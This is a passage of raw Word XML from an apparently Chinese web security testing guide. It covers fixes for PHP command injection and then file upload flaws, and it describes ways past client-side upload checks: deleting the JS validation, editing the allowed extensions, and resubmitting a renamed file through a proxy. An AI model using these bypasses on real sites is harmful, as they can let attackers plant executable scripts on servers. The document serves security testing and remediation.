          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="009B5731" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eval()</w:t>
      </w:r>
      <w:r w:rsidR="009B5731" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="009B5731" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exec()</w:t>
      </w:r>
      <w:r w:rsidR="009B5731" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等函数是恶意命令执行的最主要原因。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2704AEFC" w14:textId="77777777" w:rsidR="001A7A0B" w:rsidRPr="00B9082D" w:rsidRDefault="001A7A0B" w:rsidP="00B9082D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B9B1E4" w14:textId="6C1F4BC0" w:rsidR="001A7A0B" w:rsidRPr="00B9082D" w:rsidRDefault="009B5731" w:rsidP="00B9082D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：成功执行系统命令或脚本命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACAFBEC" w14:textId="77777777" w:rsidR="005F23DD" w:rsidRPr="00B9082D" w:rsidRDefault="001A7A0B" w:rsidP="00B9082D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="005F23DD" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidR="005F23DD" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中命令注入攻击漏洞带来的危害和影响很严重。防范命令注入攻击漏洞的存在可以通过以下几种方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082F8F90" w14:textId="48C18839" w:rsidR="005F23DD" w:rsidRPr="00B9082D" w:rsidRDefault="004517A2"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尽量不去</w:t>
      </w:r>
      <w:r w:rsidR="005F23DD" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行外部的应用程序或命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A3407C" w14:textId="77777777" w:rsidR="005F23DD" w:rsidRPr="00B9082D"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使用自定义函数或函数库实现外部应用程序或命令的功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ED9F3A" w14:textId="1CFB3C97" w:rsidR="005F23DD" w:rsidRPr="00B9082D"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在执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eval</w:t>
      </w:r>
      <w:r w:rsidR="00F35F50" w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等命令执行功能的函数前，校验</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C3FF5A" w14:textId="77777777" w:rsidR="00F35F50" w:rsidRPr="00B9082D"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使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>escapeshellarg</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数处理相关参数。</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Escapeshellarg</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数会将任何引起参数或命令结束的字符进行转义，如单引号“’”会被转义为“</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’”，双引号“””会被转义为“</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>””，分号“</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”会被转义为“</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”，这样</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>escapeshellarg</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会将参数内容限制在一对单引号或双引号里面，转义参数中所包含的单引号或双引号，使其无法对当前执行进行截断，实现防范命令注入攻击的目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B5B78E" w14:textId="5E56ABB6" w:rsidR="001A7A0B"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使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>safe_mode_exec_dir</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行可执行的文件路径。将</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php.ini</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>safe_mode</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>On</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后将允许执行的文件放入一个目录中，并使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>safe_mode_exec_dir</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定这个可执行的文件路径。在需要执行相应的外部程序时，程序必须在</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>safe_mode_exec_dir</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9082D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定的目录中才会允许执行，否则执行将失败。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B9D9F0" w14:textId="185D7431" w:rsidR="00B44623" w:rsidRPr="00B9082D" w:rsidRDefault="00B44623" w:rsidP="00B44623">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114DC52" w14:textId="654A8C94" w:rsidR="009C1845" w:rsidRPr="00F757E4" w:rsidRDefault="009C1845" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_Toc498434564"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>任意文件上传</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w14:paraId="495BFA80" w14:textId="73136757" w:rsidR="00E27F92" w:rsidRPr="000D173B" w:rsidRDefault="009C1845" w:rsidP="000D173B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00E27F92" w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般情况下文件上传漏洞是指用户上传了一个可执行的脚本文件，并通过此脚本文件获得了执行服务器端命令的能力。文件上传本身是</w:t>
      </w:r>
      <w:r w:rsidR="00E27F92" w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="00E27F92" w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中最为常见的一种功能需求，关键是文件上传之后服务器端的处理、解释文件的过程是否安全。一般的情况有：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A5EEF1" w14:textId="4FDB3D66" w:rsidR="00E27F92" w:rsidRPr="000D173B" w:rsidRDefault="00E27F92" w:rsidP="000D173B">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传文件</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本语言，服务器的</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器解释并执行了用户上传的脚本，导致代码执行；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CC89B7" w14:textId="33EA1E80" w:rsidR="00E27F92" w:rsidRPr="000D173B" w:rsidRDefault="00E27F92" w:rsidP="000D173B">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传文件</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FLASH</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>策略文件</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crossdomain.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，以此来控制</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Flash</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在该域下的行为；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CBF61E" w14:textId="37A0F5D5" w:rsidR="00E27F92" w:rsidRPr="000D173B" w:rsidRDefault="00E27F92" w:rsidP="000D173B">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传文件是病毒、木马文件，攻击者用以诱骗用户或管理员下载执行；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DB09F2" w14:textId="21E8AECA" w:rsidR="009C1845" w:rsidRPr="000D173B" w:rsidRDefault="00D263F6" w:rsidP="000D173B">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传文件是钓鱼图片或</w:t>
      </w:r>
      <w:r w:rsidR="00E27F92" w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包含了脚本的图片，某些浏览器会作为脚本执行，</w:t>
      </w:r>
      <w:r w:rsidR="001A75BA" w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用于</w:t>
      </w:r>
      <w:r w:rsidR="00E27F92" w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实施钓鱼或欺诈；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6613000E" w14:textId="77777777" w:rsidR="00CA34B8" w:rsidRPr="000D173B" w:rsidRDefault="009C1845" w:rsidP="000D173B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00CA34B8" w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传方式根据不同的</w:t>
      </w:r>
      <w:r w:rsidR="00CA34B8" w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="00CA34B8" w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言，检测方法也各式各样，以下列举基于</w:t>
      </w:r>
      <w:r w:rsidR="00CA34B8" w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JS</w:t>
      </w:r>
      <w:r w:rsidR="00CA34B8" w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证的上传的几种常见的文件上传绕过方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F609DB" w14:textId="03685071"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直接删除代码中</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>onsubmit</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件中关于文件上传时验证上传文件的相关代码即可。如图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E4D832" w14:textId="6A95047D"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385E95C6" wp14:editId="129B4AE6">
            <wp:extent cx="4165600" cy="1257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5600" cy="1257300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2446D481" w14:textId="77777777"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直接更改文件上传</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JS</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码中允许上传的文件扩展名你想要上传的文件扩展名，如图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C531747" w14:textId="139C0D55"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FA496A9" wp14:editId="06194C98">
            <wp:extent cx="4178300" cy="18542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0" cy="1854200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB0E466" w14:textId="1F34D139"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使用本地提交表单即可，如图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F36DC38" w14:textId="1AD42028"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0834A10C" wp14:editId="3FFAFD4C">
            <wp:extent cx="4165600" cy="16129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600" cy="1612900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AB2EE7" w14:textId="77777777"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使用</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者是</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fiddle</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等代理工具提交，本地文件先更改为</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jpg</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
